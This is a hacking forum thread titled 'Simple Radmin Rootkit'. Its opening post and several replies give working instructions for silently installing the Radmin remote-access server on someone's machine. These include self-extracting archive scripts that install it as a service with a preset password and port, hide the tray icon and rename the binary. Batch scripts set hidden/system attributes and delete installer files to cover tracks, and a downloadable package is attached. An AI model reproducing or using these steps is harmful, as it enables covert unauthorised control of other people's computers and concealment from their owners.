37 replies to this topic

[Tyler]

Simple Radmin Rootkit
Written By Insanity

Alright this is a way of making a rootkit with the radmin server.
There are to files in the rar. there is Radmin.exe and Radmin2.exe

These programs are quite simple to make and doens't take much will power to do eather.

*NOTE, with both files you need Admdll.dll and raddrv.dll because they are mandatory dll's that you need to run the r_server service

Radmin.exe

Okay for radmin.exe this is what you can do, you get your files r_server, Admdll.dll, raddrv.dll and Radmin.reg

(*Note, to get radmin.reg with the settings you want you have to install the server on your computer first and then grab the settins from the registry)

So for the default registry in radmin.exe they tray icon is disabled and has a default password and port.

So you make a .rar (Using Winrar) and in the comments your going to want to put

Path=NetMeeting
SavePath
Setup=regedit.exe /s Radmin.reg 
Setup=r_server.exe /pass:Insanity /port:60023 /install /silence
Setup=r_server.exe /start
Silent=1
Overwrite=2

For path=netmeeting that means that it is going to install in the programfiles netmeeting folder.

Save Path is just so everything that u execute after that is taking place there

Setup=regedit.exe /s Radmin.exe silently adds your registry files that you got

Setup=R_server.exe /pass:Insanity /port:60023 /silence, Okay This is a Big thing, If you setup your registry file with the password port you want then you can use that instead of this step and that way your password and port will be encrypted and you can completely forget that step altogether

Setp=r_server.exe /start starts up the program

Silent=1 keeps everything silent and Overwrite=2 will overwrite anything that is already in that folder.

Radmin2.exe

Radmin2.exe is basically the exact same but doenst have a radmin.reg because it just uses the dfault settings and then saves the password and port via Setup=win32.exe /pass:Insanity /port:60023 /save /silence
and make sure u do 
Setup=win32.exe /install /silence
(That /install is important because that installs it as a service as opposed to jsut running it)

This way is simpler but your pasword etc are not encrypted.

R_server.exe is renamed to win32.exe and can be renamed to anything you want to make it less obvoius of what it is :)

There are ways to spice this up using bat files and hct and masking a service name etc but you can figure out how to do that youself..

good luck

Edit* Can you please move this into the right sectoin if this isn't the right place to put it thank you

Attached Files

•  radmin.rar   503.49K   6797 downloads

[Travis]

Haven't looked at the attachments but generally looks like you've got the post down pretty good,

and it is in the right forum. will keep an eye on you and advise you if your in the wrong section no need to worry about it, we don't usually get nasty for misposting

[Tyler]

alright, well deeply appreciated for imforming me of that. haha dont wan't anyone mad at me

[sin2oo5]

hey dude, i was just looking for something like that, but both executeables dont seem to work for me, i just tested them in my testlab

the radmin2.exe gives a error message (admdll missing, and thats strange cuz these one is included in the rar archive right?)

the radmin.exe is just running but doesnt start the r_server.exe....

[Tyler]

ii dont know what is wrong with radmin2.exe and for the radmin.exe try going start=radmin.bat /s

in the bat you can put
@echo off
net start r_server
net stop r_server
.
..
...
....
...
..
.
net start r_server

it should start then.. all of the dots are just cause im bored... if you could put like a 10 second delay time inbetween there (Not sure how, google it!) then it should start up the way you want... (PLUS, try making your own registry, thats the easist way to do it

also if you want to clean up your tracks so people dont know waht service your starting just do a
del <file's you want> and they will be gone so.....
del radmin.bat
del radmin.reg
del radmin.exe (NOTE, note the R_SERVER.exe and then you will have only the nessicary files you need and people wont be able to steal your stuff as easily

[cloud9ine]

try this:

@echo off
regedit.exe /s Radmin.reg
remote.exe /install /silence
remote.exe /pass:infinity /port:5555 /save /silence
remote.exe /start
attrib +r +a +s AdmDll.dll
attrib +r +a +s raddrv.dll
attrib +r +a +s remote.exe
del /f Radmin.reg
echo ooooo > install.bat

Also, when creating the SFX, make sure to change the advanced options to not prompt the user , and to run install.bat after extraction


edit: I believe the reason the SFX you uploaded did not work is because it contained r_server.exe instead of remote.exe

[Serhat]

<removed some lines.. didn't read it properly I guess>
only thing I don't like is... well it's too easy to read the content of the SFX 'script'..

edit: I believe the reason the SFX you uploaded did not work is because it contained r_server.exe instead of remote.exe 

<{POST_SNAPBACK}>

That's because he uses r_server.exe in the SFX script as well.. and not remote.exe

Serhat

[Tyler]

lol, whats the difference between r_server and remote.exe?
if you say just the name then

I believe the reason the SFX you uploaded did not work is because it contained r_server.exe instead of remote.exe

is Irrelavent


but yeah... i guess i could upload a couple workign proggies... but i kinda like the idea of them having minor bugs because then it gives people the chance to learn from the info we have given them and to fix it themselves that way they can make it themselves next time...

hehe but yeah mine runs with hct.exe(the undetected one) cause i like the service starting and stopping and i plan to incorperate the service daemon so it changes the service name

[kuki]

nice rootkit coded by You but imho you can find all these files in normall official radmin installation directory and read about "sneaky" way to execute on "help.hlp" file from da dir :x

thanks anyway <= this is *NO* thx post

BN Says: OK! <= this is *NO* warning post

[Tyler]

it doenst have to be help.hlp it can be any file and you can do that with a bunch of differen't ways to do that... not just with rootkits ... but yeah thanks for the pointer anyways

[Majika]

also if you want to clean up your tracks so people dont know waht service your starting just do a
del <file's you want> and they will be gone so.....
del radmin.bat
del radmin.reg
del radmin.exe (NOTE, note the R_SERVER.exe and then you will have only the nessicary files you need and people wont be able to steal your stuff as easily

<{POST_SNAPBACK}>

That is what I have been seeing in other example kits of this kind. I have also been making these kits partly from other examples and from reading up post like your's. I am curious about the 'del' command what does it mead and where can I find out more about it....

I mean a proper explanation about its functions and prehaps how to impliment it in a working script of my own.

Does the 'del' command work the same as the 'START' command..

other that that Insane your radmin rewtkit is a fine example

[click]

I am curious about the 'del' command what does it mead and where can I find out more about it....

I mean a proper explanation about its functions and prehaps how to impliment it in a working script of my own.

Does the 'del' command work the same as the 'START' command..

<{POST_SNAPBACK}>

really??? you have A LOT to learn! but, I will still try to help you out on this one...

You might want to do a ton of reading from the following sites, in the order they are listed...
h**p://83.67.55.228/page8.htm <-- overall MSDOS tutorial
h**p://www.lagmonster.org/docs/DOS7/ <-- command listing, including information on the elusive "del" command!
h**p://home7.inet.tele.dk/batfiles/ <-- information on Batch File Programming (this is what you seem to want to be able to do, but you need to read the links above first... sooo much to learn! lol)

Eventually, you will find out that Batch File Programming is EXTREMELY limited (pretty useless), but is not only a good start, but also an invaluable resource for advanced hacking (for example, with most buffer overflows). I suggest that you eventually start looking into Perl, C++, and eventually ASM. Good luck!

NOTE: just incase you are clicking on the links, and you find they don't work... just copy the link into the address box, and change h**p to http... i really hope you knew this!

[Logan]

well, I'm not sure you coded this rootkit as I have seen about 3 dozen (inlcuding one by me) of these laying around. The best way to make a rootkit out of radmin is to actually go in and hex edit the values. Overall I like the concept and it is a good first go at a rootkit.

For you're next project...I would suggest trying to make a HxDef modded kit ot a FU Rootkit mod

Also for further reading: www.rootkit.com <--very good knowledge DB.

Cheers,

[Tyler]

lol i know all about hxdef and have rootkits made but i am trying to make it just for the purpose of introducing basic rootkit's to member's that don't even know that... Btw i did hex edit the values in the first one... it hink but yeah i actually coded this rootkit... but wow 3 dozen... yeah i've prob seen around 150 of those type's of rootkits bouncin around and yeah its quite interesting... i think the best way is to find kits that hackers have left and disect them and learn that way.. thats what i tend to do for basic root kits , but as for the undecting and what not i leave that up to c and hex edit like you said

[tibbar]

is this the 30 day timeout version of radmin? if not please remove the attachment since this is a commercial product.